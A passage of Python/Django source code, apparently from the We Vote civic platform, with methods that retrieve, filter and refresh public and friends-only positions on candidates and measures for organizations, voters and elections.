candidates_dict = {}
measures_dict = {}
organizations_dict = {}
voters_by_linked_org_dict = {}
voters_dict = {}
if positive_value_exists(google_civic_election_id):
# Visible to the Public
public_positions_list = PositionEntered.objects.all()
public_positions_list = public_positions_list.filter(
google_civic_election_id=google_civic_election_id)
for one_position in public_positions_list:
results = position_manager.refresh_cached_position_info(
one_position, force_update,
offices_dict=offices_dict,
candidates_dict=candidates_dict,
measures_dict=measures_dict,
organizations_dict=organizations_dict,
voters_by_linked_org_dict=voters_by_linked_org_dict,
voters_dict=voters_dict)
offices_dict = results['offices_dict']
candidates_dict = results['candidates_dict']
measures_dict = results['measures_dict']
organizations_dict = results['organizations_dict']
voters_by_linked_org_dict = results['voters_by_linked_org_dict']
voters_dict = results['voters_dict']
public_positions_updated += 1
# Visible to We Vote friends only
friends_only_positions_list = PositionForFriends.objects.all()
friends_only_positions_list = friends_only_positions_list.filter(
google_civic_election_id=google_civic_election_id)
for one_position in friends_only_positions_list:
results = position_manager.refresh_cached_position_info(
one_position, force_update,
offices_dict=offices_dict,
candidates_dict=candidates_dict,
measures_dict=measures_dict,
organizations_dict=organizations_dict,
voters_by_linked_org_dict=voters_by_linked_org_dict,
voters_dict=voters_dict)
offices_dict = results['offices_dict']
candidates_dict = results['candidates_dict']
measures_dict = results['measures_dict']
organizations_dict = results['organizations_dict']
voters_by_linked_org_dict = results['voters_by_linked_org_dict']
voters_dict = results['voters_dict']
friends_only_positions_updated += 1
results = {
'success': success,
'status': status,
'public_positions_updated': public_positions_updated,
'friends_only_positions_updated': friends_only_positions_updated,
}
return results
def refresh_cached_position_info_for_organization(self, organization_we_vote_id):
position_manager = PositionManager()
force_update = True
offices_dict = {}
candidates_dict = {}
measures_dict = {}
organizations_dict = {}
voters_by_linked_org_dict = {}
voters_dict = {}
# Visible to the Public
public_positions_list = PositionEntered.objects.all()
public_positions_list = public_positions_list.filter(organization_we_vote_id__iexact=organization_we_vote_id)
for one_position in public_positions_list:
results = position_manager.refresh_cached_position_info(
one_position, force_update,
offices_dict=offices_dict,
candidates_dict=candidates_dict,
measures_dict=measures_dict,
organizations_dict=organizations_dict,
voters_by_linked_org_dict=voters_by_linked_org_dict,
voters_dict=voters_dict)
offices_dict = results['offices_dict']
candidates_dict = results['candidates_dict']
measures_dict = results['measures_dict']
organizations_dict = results['organizations_dict']
voters_by_linked_org_dict = results['voters_by_linked_org_dict']
voters_dict = results['voters_dict']
# Visible to We Vote friends only
friends_only_positions_list = PositionForFriends.objects.all()
friends_only_positions_list = friends_only_positions_list.filter(
organization_we_vote_id__iexact=organization_we_vote_id)
for one_position in friends_only_positions_list:
results = position_manager.refresh_cached_position_info(
one_position, force_update,
offices_dict=offices_dict,
candidates_dict=candidates_dict,
measures_dict=measures_dict,
organizations_dict=organizations_dict,
voters_by_linked_org_dict=voters_by_linked_org_dict,
voters_dict=voters_dict)
offices_dict = results['offices_dict']
candidates_dict = results['candidates_dict']
measures_dict = results['measures_dict']
organizations_dict = results['organizations_dict']
voters_by_linked_org_dict = results['voters_by_linked_org_dict']
voters_dict = results['voters_dict']
return True
def retrieve_all_positions_for_organization(self, organization_id, organization_we_vote_id,
stance_we_are_looking_for, friends_vs_public,
show_positions_current_voter_election=False,
exclude_positions_current_voter_election=False, voter_device_id='',
google_civic_election_id=0,
state_code='', read_only=False):
"""
Return a position list with all of the organization's positions.
Incoming filters include: stance_we_are_looking_for, friends_vs_public, show_positions_current_voter_election,
exclude_positions_current_voter_election, google_civic_election_id, state_code
:param organization_id:
:param organization_we_vote_id:
:param stance_we_are_looking_for:
:param friends_vs_public:
:param show_positions_current_voter_election: Show the positions relevant to the election the voter is
currently looking at
:param exclude_positions_current_voter_election: Show positions for all elections the voter is NOT looking at
:param voter_device_id:
:param google_civic_election_id:
:param state_code:
:param read_only:
:return:
"""
status = ""
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
position_list = []
message = "[retrieve_all_positions_for_organization, missing stance: " \
"" + str(stance_we_are_looking_for) + "]"
print_to_log(logger=logger, exception_message_optional=message)
return position_list
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(organization_id) and not \
positive_value_exists(organization_we_vote_id):
position_list = []
message = "[retrieve_all_positions_for_organization, missing organization id: " \
"" + str(stance_we_are_looking_for) + "]"
print_to_log(logger=logger, exception_message_optional=message)
return position_list
retrieve_friends_positions = friends_vs_public in (FRIENDS_ONLY, FRIENDS_AND_PUBLIC)
retrieve_public_positions = friends_vs_public in (PUBLIC_ONLY, FRIENDS_AND_PUBLIC)
if not retrieve_friends_positions and not retrieve_public_positions:
status += "RETRIEVE_X_POSITIONS_MISSING "
message = "RETRIEVE_X_POSITIONS_MISSING "
print_to_log(logger=logger, exception_message_optional=message)
# Retrieve public positions for this organization
public_positions_list = []
friends_positions_list = []
position_list_found = False
public_query_exists = True
if retrieve_public_positions:
status += "RETRIEVE_PUBLIC_POSITIONS "
try:
# We intentionally do not use 'readonly' here since we need to save based on the results of this query
# Removed this order_by: '-vote_smart_time_span',
# DALE 2018-09-07 Speeding up retrieve by removing order_by
# public_positions_list = PositionEntered.objects.order_by('ballot_item_display_name',
# '-google_civic_election_id')
if read_only:
public_positions_list = PositionEntered.objects.using('readonly').all()
else:
public_positions_list = PositionEntered.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
public_positions_list = public_positions_list.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(organization_id):
public_positions_list = public_positions_list.filter(organization_id=organization_id)
else:
public_positions_list = public_positions_list.filter(
organization_we_vote_id__iexact=organization_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# public_positions_list = public_positions_list.filter(stance=stance_we_are_looking_for
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING))
# | Q(stance=GRADE_RATING))
# else:
# public_positions_list = public_positions_list.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
public_positions_list = public_positions_list.filter(stance__iexact=stance_we_are_looking_for)
google_civic_election_id_local_scope = 0
if positive_value_exists(show_positions_current_voter_election) \
or positive_value_exists(exclude_positions_current_voter_election):
results = figure_out_google_civic_election_id_voter_is_watching(voter_device_id)
google_civic_election_id_local_scope = results['google_civic_election_id']
# We can filter by only one of these
if positive_value_exists(show_positions_current_voter_election): # This is the default option
if positive_value_exists(google_civic_election_id):
# Please note that this option doesn't catch Vote Smart ratings, which are not
# linked by google_civic_election_id
public_positions_list = public_positions_list.filter(
google_civic_election_id=google_civic_election_id)
elif positive_value_exists(google_civic_election_id_local_scope):
# Limit positions we can retrieve for an org to only the items in this election
public_positions_list = public_positions_list.filter(
google_civic_election_id=google_civic_election_id_local_scope)
else:
# Leave the position_list as is for now. TODO: We really should have election_id
# # If no election is found for the voter, don't show any positions
# public_positions_list = []
# public_query_exists = False
pass
elif positive_value_exists(exclude_positions_current_voter_election):
if positive_value_exists(google_civic_election_id):
# Please note that this option doesn't catch Vote Smart ratings, which are not
# linked by google_civic_election_id
public_positions_list = public_positions_list.filter(
google_civic_election_id=google_civic_election_id)
elif positive_value_exists(google_civic_election_id_local_scope):
# Limit positions we can retrieve for an org to only the items NOT in this election
public_positions_list = public_positions_list.exclude(
google_civic_election_id=google_civic_election_id_local_scope)
else:
# Leave the position_list as is.
pass
elif positive_value_exists(google_civic_election_id):
# Please note that this option doesn't catch Vote Smart ratings, which are not
# linked by google_civic_election_id
public_positions_list = public_positions_list.filter(
google_civic_election_id=google_civic_election_id)
elif positive_value_exists(state_code):
public_positions_list = public_positions_list.filter(state_code__iexact=state_code)
# And finally, make sure there is a stance, or text commentary -- exclude cases where there isn't
if public_query_exists:
public_positions_list = public_positions_list.exclude(
Q(stance__iexact=NO_STANCE) &
(Q(statement_text__isnull=True) | Q(statement_text__exact=''))
# Not working with statement_html yet
# &
# (Q(statement_html__isnull=True) | Q(statement_html__exact=''))
)
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if retrieve_friends_positions:
status += "RETRIEVE_FRIENDS_POSITIONS "
try:
# Current voter visiting the site
current_voter_we_vote_id = ""
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id, read_only=True)
if results['voter_found']:
voter = results['voter']
current_voter_we_vote_id = voter.we_vote_id
# We need organization_we_vote_id, so look it up if only organization_id was passed in
if not organization_we_vote_id:
organization_manager = OrganizationManager()
organization_we_vote_id = organization_manager.fetch_we_vote_id_from_local_id(organization_id)
# Find the Voter id for the organization showing the positions. Organizations that sign in with
# their Twitter accounts get a Voter entry, with "voter.linked_organization_we_vote_id" containing
# the organizations we_vote_id.
results = voter_manager.retrieve_voter_by_organization_we_vote_id(organization_we_vote_id,
read_only=True)
organization_voter_local_id = 0
organization_voter_we_vote_id = ""
if results['voter_found']:
organization_voter = results['voter']
organization_voter_local_id = organization_voter.id
organization_voter_we_vote_id = organization_voter.we_vote_id
# Is the viewer a friend of this organization? If NOT, then there is no need to proceed
voter_is_friend_of_organization = False
if positive_value_exists(current_voter_we_vote_id) and \
organization_voter_we_vote_id.lower() == current_voter_we_vote_id.lower():
# If the current viewer is looking at own entry, then show what should be shown to friends
voter_is_friend_of_organization = True
elif positive_value_exists(current_voter_we_vote_id):
friend_manager = FriendManager()
# Already read_only
friend_results = friend_manager.retrieve_friends_we_vote_id_list(current_voter_we_vote_id)
if friend_results['friends_we_vote_id_list_found']:
friends_we_vote_id_list = friend_results['friends_we_vote_id_list']
# Check to see if current voter is in list of friends
if organization_voter_we_vote_id in friends_we_vote_id_list:
voter_is_friend_of_organization = True
friends_positions_list = []
friends_query_exists = True
if voter_is_friend_of_organization:
# If here, then the viewer is a friend with the organization. Look up positions that
# are only shown to friends.
# '-vote_smart_time_span',
# DALE 2018-09-07 Speeding up retrieve by removing order_by
# friends_positions_list = PositionForFriends.objects.order_by('ballot_item_display_name',
# '-google_civic_election_id')
if read_only:
friends_positions_list = PositionForFriends.objects.using('readonly').all()
else:
friends_positions_list = PositionForFriends.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
friends_positions_list = friends_positions_list.exclude(stance__iexact=PERCENT_RATING)
# Get the entries saved by the organization's voter account
if positive_value_exists(organization_voter_local_id):
friends_positions_list = friends_positions_list.filter(
voter_id=organization_voter_local_id)
else:
friends_positions_list = friends_positions_list.filter(
voter_we_vote_id__iexact=organization_voter_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# friends_positions_list = friends_positions_list.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING))
# # | Q(stance=GRADE_RATING))
# else:
# friends_positions_list = friends_positions_list.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
friends_positions_list = friends_positions_list.filter(stance__iexact=stance_we_are_looking_for)
# Gather the ids for all positions in this election so we can figure out which positions
# relate to the election the voter is currently looking at, vs. for all other elections
google_civic_election_id_local_scope = 0
if positive_value_exists(show_positions_current_voter_election) \
or positive_value_exists(exclude_positions_current_voter_election):
results = figure_out_google_civic_election_id_voter_is_watching(voter_device_id)
google_civic_election_id_local_scope = results['google_civic_election_id']
# We can filter by only one of these
if positive_value_exists(show_positions_current_voter_election): # This is the default option
if positive_value_exists(google_civic_election_id_local_scope):
# Limit positions we can retrieve for an org to only the items in this election
friends_positions_list = friends_positions_list.filter(
google_civic_election_id=google_civic_election_id_local_scope)
else:
# Leave the position_list as is for now. TODO: We really should have election_id
# # If no election is found for the voter, don't show any positions
# friends_positions_list = []
# friends_query_exists = False
pass
elif positive_value_exists(exclude_positions_current_voter_election):
if positive_value_exists(google_civic_election_id_local_scope):
# Limit positions we can retrieve for an org to only the items NOT in this election
friends_positions_list = friends_positions_list.exclude(
google_civic_election_id=google_civic_election_id_local_scope)
else:
# Leave the position_list as is.
pass
elif positive_value_exists(google_civic_election_id):
# Please note that this option doesn't catch Vote Smart ratings (yet), which are not
# linked by google_civic_election_id
# We are only using this if google_civic_election_id was passed
# into retrieve_all_positions_for_organization
friends_positions_list = friends_positions_list.filter(
google_civic_election_id=google_civic_election_id)
elif positive_value_exists(state_code):
friends_positions_list = friends_positions_list.filter(state_code__iexact=state_code)
if friends_query_exists:
# And finally, make sure there is a stance, or text commentary -- exclude cases when there isn't
friends_positions_list = friends_positions_list.exclude(
Q(stance__iexact=NO_STANCE) &
(Q(statement_text__isnull=True) | Q(statement_text__exact=''))
# Not working with statement_html yet
# &
# (Q(statement_html__isnull=True) | Q(statement_html__exact=''))
)
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
# Merge public positions and "For friends" positions
public_positions_list = list(public_positions_list) # Force the query to run
# 2018-05 We now have an "is_public_position()" function
# # Flag all of these entries as "is_public_position = True"
# revised_position_list = []
# for one_position in public_positions_list:
# one_position.is_public_position = True # Add this value
# revised_position_list.append(one_position)
# public_positions_list = revised_position_list
friends_positions_list = list(friends_positions_list) # Force the query to run
# 2018-05 We now have an "is_public_position()" function
# # Flag all of these entries as "is_public_position = False"
# revised_position_list = []
# for one_position in friends_positions_list:
# one_position.is_public_position = False # Add this value
# revised_position_list.append(one_position)
# friends_positions_list = revised_position_list
position_list = public_positions_list + friends_positions_list
# Now filter out the positions that have a percent rating that doesn't match the stance_we_are_looking_for
# As of Aug 2018 we are no longer using PERCENT_RATING
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# revised_position_list = []
# for one_position in position_list:
# if stance_we_are_looking_for == SUPPORT:
# if one_position.stance == PERCENT_RATING:
# if one_position.is_support_or_positive_rating():
# revised_position_list.append(one_position)
# else:
# revised_position_list.append(one_position)
# elif stance_we_are_looking_for == OPPOSE:
# if one_position.stance == PERCENT_RATING:
# if one_position.is_oppose_or_negative_rating():
# revised_position_list.append(one_position)
# else:
# revised_position_list.append(one_position)
# position_list = revised_position_list
if len(position_list):
position_list_found = True
if position_list_found:
return position_list
else:
position_list = []
return position_list
def retrieve_all_positions_for_public_figure(self, public_figure_id, public_figure_we_vote_id,
stance_we_are_looking_for,
filter_for_voter, voter_device_id,
google_civic_election_id, state_code):
# TODO DALE Implement this: retrieve_all_positions_for_public_figure,
# model after retrieve_all_positions_for_organization
position_list = []
return position_list
def retrieve_all_positions_for_voter(self, voter_id=0, voter_we_vote_id='',
stance_we_are_looking_for=ANY_STANCE, friends_vs_public=FRIENDS_AND_PUBLIC,
google_civic_election_id=0, this_election_vs_others='', state_code=''):
"""
We want the voter's position information for display prior to sign in
:param voter_id:
:param voter_we_vote_id:
:param stance_we_are_looking_for:
:param voter_we_vote_id:
:param friends_vs_public:
:param google_civic_election_id:
:param this_election_vs_others:
:param state_code:
:return:
"""
if not positive_value_exists(voter_id) and not positive_value_exists(voter_we_vote_id):
position_list = []
results = {
'status': 'MISSING_VOTER_ID',
'success': False,
'position_list_found': False,
'position_list': position_list,
}
return results
# Retrieve all positions for this voter -- if here we know that either voter_id or voter_we_vote_id exist
if stance_we_are_looking_for not \
in (ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
position_list = []
results = {
'status': 'STANCE_WE_ARE_LOOKING_FOR_NOT_VALID',
'success': False,
'position_list_found': False,
'position_list': position_list,
}
return results
retrieve_friends_positions = friends_vs_public in (FRIENDS_ONLY, FRIENDS_AND_PUBLIC)
retrieve_public_positions = friends_vs_public in (PUBLIC_ONLY, FRIENDS_AND_PUBLIC)
# Give priority to retrieve_this_election_only
retrieve_this_election_only = positive_value_exists(google_civic_election_id) \
and this_election_vs_others in THIS_ELECTION_ONLY
retrieve_all_other_elections = positive_value_exists(google_civic_election_id) \
and not retrieve_this_election_only \
and this_election_vs_others in ALL_OTHER_ELECTIONS
one_election_filter_applied = retrieve_this_election_only or retrieve_all_other_elections
retrieve_all_elections = this_election_vs_others in ALL_ELECTIONS \
or not one_election_filter_applied
# Retrieve public positions for this organization
public_positions_list = []
friends_positions_list = []
position_list_found = False
if retrieve_public_positions:
############################
# Retrieve public positions
try:
public_positions_list_query = PositionEntered.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
public_positions_list_query = public_positions_list_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(voter_id):
public_positions_list_query = public_positions_list_query.filter(voter_id=voter_id)
elif positive_value_exists(voter_we_vote_id):
public_positions_list_query = public_positions_list_query.filter(
voter_we_vote_id__iexact=voter_we_vote_id)
if retrieve_this_election_only:
public_positions_list_query = public_positions_list_query.filter(
google_civic_election_id=google_civic_election_id)
elif retrieve_all_other_elections:
public_positions_list_query = public_positions_list_query.exclude(
google_civic_election_id=google_civic_election_id)
elif positive_value_exists(state_code):
public_positions_list_query = public_positions_list_query.filter(state_code__iexact=state_code)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# public_positions_list_query = public_positions_list_query.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING))
# | Q(stance=GRADE_RATING))
# else:
# public_positions_list_query = public_positions_list_query.filter(
# stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
public_positions_list_query = public_positions_list_query.filter(
stance=stance_we_are_looking_for)
# Force the position for the most recent election to show up last
public_positions_list_query = public_positions_list_query.order_by('google_civic_election_id')
public_positions_list = list(public_positions_list_query) # Force the query to run
except Exception as e:
position_list = []
results = {
'status': 'VOTER_POSITION_FOR_PUBLIC_SEARCH_FAILED',
'success': False,
'position_list_found': False,
'position_list': position_list,
}
return results
if retrieve_friends_positions:
############################
# Retrieve positions meant for friends only
try:
friends_positions_list_query = PositionForFriends.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
friends_positions_list_query = friends_positions_list_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(voter_id):
friends_positions_list_query = friends_positions_list_query.filter(voter_id=voter_id)
elif positive_value_exists(voter_we_vote_id):
friends_positions_list_query = friends_positions_list_query.filter(
voter_we_vote_id__iexact=voter_we_vote_id)
if retrieve_this_election_only:
friends_positions_list_query = friends_positions_list_query.filter(
google_civic_election_id=google_civic_election_id)
elif retrieve_all_other_elections:
friends_positions_list_query = friends_positions_list_query.exclude(
google_civic_election_id=google_civic_election_id)
elif positive_value_exists(state_code):
friends_positions_list_query = friends_positions_list_query.filter(state_code__iexact=state_code)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# friends_positions_list_query = friends_positions_list_query.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING))
# | Q(stance=GRADE_RATING))
# else:
# friends_positions_list_query = friends_positions_list_query.filter(
# stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
friends_positions_list_query = friends_positions_list_query.filter(
stance=stance_we_are_looking_for)
# Force the position for the most recent election to show up last
friends_positions_list_query = friends_positions_list_query.order_by('google_civic_election_id')
friends_positions_list = list(friends_positions_list_query) # Force the query to run
except Exception as e:
position_list = []
results = {
'status': 'VOTER_POSITION_FOR_FRIENDS_SEARCH_FAILED',
'success': False,
'position_list_found': False,
'position_list': position_list,
}
return results
# Merge public positions and "For friends" positions
# 2018-05 We now have an "is_public_position()" function
# # Flag all of these entries as "is_public_position = True"
# revised_position_list = []
# for one_position in public_positions_list:
# one_position.is_public_position = True # Add this value
# revised_position_list.append(one_position)
# public_positions_list = revised_position_list
# 2018-05 We now have an "is_public_position()" function
# # Flag all of these entries as "is_public_position = False"
# revised_position_list = []
# for one_position in friends_positions_list:
# one_position.is_public_position = False # Add this value
# revised_position_list.append(one_position)
# friends_positions_list = revised_position_list
position_list = public_positions_list + friends_positions_list
# Now filter out the positions that have a percent rating that doesn't match the stance_we_are_looking_for
if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
revised_position_list = []
for one_position in position_list:
if stance_we_are_looking_for == SUPPORT:
if one_position.stance == PERCENT_RATING:
if one_position.is_support_or_positive_rating():
revised_position_list.append(one_position)
else:
revised_position_list.append(one_position)
elif stance_we_are_looking_for == OPPOSE:
if one_position.stance == PERCENT_RATING:
if one_position.is_oppose_or_negative_rating():
revised_position_list.append(one_position)
else:
revised_position_list.append(one_position)
position_list = revised_position_list
if len(position_list):
position_list_found = True
if position_list_found:
enhanced_position_list = []
for position in position_list:
# Make sure we have a ballot_item_we_vote_id
if positive_value_exists(position.candidate_campaign_we_vote_id):
position.ballot_item_we_vote_id = position.candidate_campaign_we_vote_id
elif positive_value_exists(position.contest_measure_we_vote_id):
position.ballot_item_we_vote_id = position.contest_measure_we_vote_id
else:
continue
enhanced_position_list.append(position)
results = {
'status': 'VOTER_POSITION_LIST_FOUND',
'success': True,
'position_list_found': True,
'position_list': enhanced_position_list,
}
return results
else:
position_list = []
results = {
'status': 'VOTER_POSITION_LIST_NOT_FOUND',
'success': True,
'position_list_found': False,
'position_list': position_list,
}
return results
def retrieve_all_positions_for_voter_simple(self, voter_id=0, voter_we_vote_id='', google_civic_election_id=0):
"""
We just want the barest of information.
:param voter_id:
:param voter_we_vote_id:
:param google_civic_election_id:
:return:
"""
if not positive_value_exists(voter_id) and not positive_value_exists(voter_we_vote_id):
position_list = []
results = {
'status': 'MISSING_VOTER_ID',
'success': False,
'position_list_found': False,
'position_list': position_list,
}
return results
# Retrieve all positions for this voter -- if here we know that either voter_id or voter_we_vote_id exist
############################
# Retrieve public positions
try:
public_positions_list_query = PositionEntered.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
public_positions_list_query = public_positions_list_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(voter_id):
public_positions_list_query = public_positions_list_query.filter(voter_id=voter_id)
elif positive_value_exists(voter_we_vote_id):
public_positions_list_query = public_positions_list_query.filter(
voter_we_vote_id__iexact=voter_we_vote_id)
if positive_value_exists(google_civic_election_id):
public_positions_list_query = public_positions_list_query.filter(
google_civic_election_id=google_civic_election_id)
# Force the position for the most recent election to show up last
public_positions_list_query = public_positions_list_query.order_by('google_civic_election_id')
public_positions_list = list(public_positions_list_query) # Force the query to run
except Exception as e:
position_list = []
results = {
'status': 'VOTER_POSITION_FOR_PUBLIC_SEARCH_FAILED',
'success': False,
'position_list_found': False,
'position_list': position_list,
}
return results
############################
# Retrieve positions meant for friends only
try:
friends_positions_list_query = PositionForFriends.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
friends_positions_list_query = friends_positions_list_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(voter_id):
friends_positions_list_query = friends_positions_list_query.filter(voter_id=voter_id)
elif positive_value_exists(voter_we_vote_id):
friends_positions_list_query = friends_positions_list_query.filter(
voter_we_vote_id__iexact=voter_we_vote_id)
if positive_value_exists(google_civic_election_id):
friends_positions_list_query = friends_positions_list_query.filter(
google_civic_election_id=google_civic_election_id)
# Force the position for the most recent election to show up last
friends_positions_list_query = friends_positions_list_query.order_by('google_civic_election_id')
friends_positions_list = list(friends_positions_list_query) # Force the query to run
except Exception as e:
position_list = []
results = {
'status': 'VOTER_POSITION_FOR_FRIENDS_SEARCH_FAILED',
'success': False,
'position_list_found': False,
'position_list': position_list,
}
return results
# 2018-05 We now have an "is_public_position()" function
# # Mark these positions as "is_public_position"
# public_positions_list2 = []
# for one_public_position in public_positions_list:
# one_public_position.is_public_position = True
# public_positions_list2.append(one_public_position)
#
# # Mark these positions as NOT "is_public_position"
# friends_positions_list2 = []
# for one_friends_position in friends_positions_list:
# one_friends_position.is_public_position = False
# friends_positions_list2.append(one_friends_position)
# Merge public positions and "For friends" positions
position_list = public_positions_list + friends_positions_list
position_list_found = len(position_list)
if position_list_found:
simple_position_list = []
for position in position_list:
# Make sure we have a ballot_item_we_vote_id
if positive_value_exists(position.candidate_campaign_we_vote_id):
ballot_item_we_vote_id = position.candidate_campaign_we_vote_id
elif positive_value_exists(position.contest_measure_we_vote_id):
ballot_item_we_vote_id = position.contest_measure_we_vote_id
else:
continue
one_position = {
'ballot_item_we_vote_id': ballot_item_we_vote_id,
'is_support': position.is_support(),
'is_oppose': position.is_oppose(),
'statement_text': position.statement_text,
'is_public_position': position.is_public_position(),
}
simple_position_list.append(one_position)
results = {
'status': 'VOTER_POSITION_LIST_FOUND',
'success': True,
'position_list_found': True,
'position_list': simple_position_list,
}
return results
else:
position_list = []
results = {
'status': 'VOTER_POSITION_LIST_NOT_FOUND',
'success': True,
'position_list_found': False,
'position_list': position_list,
}
return results
def retrieve_all_positions_for_election(self, google_civic_election_id, stance_we_are_looking_for=ANY_STANCE,
public_only=False, limit_to_organization_we_vote_ids=[]):
"""
Since we don't have a single way to ask the positions tables for only the positions related to a single
election, we need to look up the data in a round-about way. We get all candidates and measures in the election,
then return all positions that are about any of those candidates or measures.
:param google_civic_election_id:
:param stance_we_are_looking_for:
:param public_only: Do we care about public positions? Or friend's only positions?
:param limit_to_organization_we_vote_ids: Pass in a list of organizations
:return:
"""
position_list = []
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
position_list = []
return position_list
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(google_civic_election_id):
position_list = []
return position_list
position_list_found = False
try:
if public_only:
# Only return public positions
position_list_query = PositionEntered.objects.order_by('-date_entered')
else:
# Only return PositionForFriends entries
position_list_query = PositionForFriends.objects.order_by('-date_entered')
position_list_query = position_list_query.filter(google_civic_election_id=google_civic_election_id)
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
if stance_we_are_looking_for != ANY_STANCE:
# If we passed in the stance "ANY" it means we want to not filter down the list
position_list_query = position_list_query.filter(stance__iexact=stance_we_are_looking_for)
if positive_value_exists(limit_to_organization_we_vote_ids) and len(limit_to_organization_we_vote_ids):
position_list_query = position_list_query.filter(
organization_we_vote_id__in=limit_to_organization_we_vote_ids)
position_list = list(position_list_query)
if len(position_list):
position_list_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if position_list_found:
return position_list
else:
position_list = []
return position_list
def remove_older_positions_for_each_org(self, position_list):
# If we have multiple positions for one org, we only want to show the most recent
organization_already_reviewed = []
organization_with_multiple_positions = []
newest_position_for_org = {} # Figure out the newest position per org that we should show
for one_position in position_list:
if one_position.organization_we_vote_id:
if one_position.organization_we_vote_id not in organization_already_reviewed:
organization_already_reviewed.append(one_position.organization_we_vote_id)
# Are we dealing with a time span (instead of google_civic_election_id)?
if positive_value_exists(one_position.vote_smart_time_span):
# Take the first four digits of one_position.vote_smart_time_span
first_four_digits = convert_to_int(one_position.vote_smart_time_span[:4])
# And figure out the newest position for each org
if one_position.organization_we_vote_id in newest_position_for_org:
# If we are here, it means we have seen this organization once already
if one_position.organization_we_vote_id not in organization_with_multiple_positions:
organization_with_multiple_positions.append(one_position.organization_we_vote_id)
# If this position is newer than the one already looked at, update newest_position_for_org
if first_four_digits > newest_position_for_org[one_position.organization_we_vote_id]:
newest_position_for_org[one_position.organization_we_vote_id] = first_four_digits
else:
newest_position_for_org[one_position.organization_we_vote_id] = first_four_digits
position_list_filtered = []
position_included_for_this_org = {}
for one_position in position_list:
if one_position.organization_we_vote_id in organization_with_multiple_positions:
if positive_value_exists(one_position.vote_smart_time_span):
first_four_digits = convert_to_int(one_position.vote_smart_time_span[:4])
if (newest_position_for_org[one_position.organization_we_vote_id] == first_four_digits) and \
(one_position.organization_we_vote_id not in position_included_for_this_org):
# If this position is the newest from among the organization's positions, include in results
position_list_filtered.append(one_position)
# Only add one position to position_list_filtered once
position_included_for_this_org[one_position.organization_we_vote_id] = True
else:
position_list_filtered.append(one_position)
return position_list_filtered
def fetch_public_positions_count_for_candidate_campaign(self, candidate_campaign_id,
candidate_campaign_we_vote_id,
stance_we_are_looking_for=ANY_STANCE):
return self.fetch_positions_count_for_candidate_campaign(candidate_campaign_id,
candidate_campaign_we_vote_id,
stance_we_are_looking_for,
PUBLIC_ONLY)
def fetch_friends_only_positions_count_for_candidate_campaign(self, candidate_campaign_id,
candidate_campaign_we_vote_id,
stance_we_are_looking_for=ANY_STANCE):
return self.fetch_positions_count_for_candidate_campaign(candidate_campaign_id,
candidate_campaign_we_vote_id,
stance_we_are_looking_for,
FRIENDS_ONLY)
@staticmethod
def fetch_positions_count_for_candidate_campaign(candidate_campaign_id,
candidate_campaign_we_vote_id,
stance_we_are_looking_for,
public_or_private=PUBLIC_ONLY,
friends_we_vote_id_list=False,
organizations_followed_we_vote_id_list=False):
if stance_we_are_looking_for not \
